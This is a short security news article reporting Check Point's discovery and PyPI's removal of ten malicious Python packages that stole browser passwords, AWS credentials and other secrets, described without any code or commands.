Security researchers from Check Point have spotted 10 malicious packages on Python Package Index (PyPI), the primary Python package index used by Python developers.
The first of them was Ascii2text, a malicious package that mimicked the popular art package by name and description.
“Interestingly, [threat actors] were smart enough to copy the entire project description without the release part, preventing users from realizing this is a fake package,” Check Point wrote.
Ascii2text would work by downloading a script that gathered passwords stored in web browsers like Google Chrome, Microsoft Edge, Brave, Opera and Yandex Browser.
In its advisory, Check Point also mentioned Pyg-utils, Pymocks and PyProto2, three separate packages with the common goal of stealing users’ AWS credentials.
The Test-async and Zlibsrc libraries also appear in the report. According to Check Point, both of them would download and execute potentially malicious code during installation.
An additional trio of malicious packages is mentioned by Check Point: Free-net-vpn, Free-net-vpn2 and WINRPCexploit – all of which are capable of stealing user credentials and environment variables.
Finally, the advisory mentions Browserdiv, a malicious package whose aim was to steal installers’ credentials by collecting and sending them to a predefined Discord webhook.
“Interestingly, while according to its naming it seems to target web design-related programming (browser, div), according to its description the package motivation is to enable the use of selfbots inside Discord,” Check Point wrote.
Once the security researchers identified these malicious users and packages, they reportedly alerted PyPI via their official website.
“Following our disclosure, PyPI removed these packages,” the advisory concluded.
Unfortunately, this is not the first time that malicious open-source packages are spotted on the PyPI repository. In November 2021, the JFrog Security research team revealed it had discovered 11 new malware packages with over 40,000 downloads from PyPI.
To reduce the presence of malicious packages on PyPI, the repository’s team started enforcing a two-factor authentication (2FA) policy for projects categorized as “critical” in July.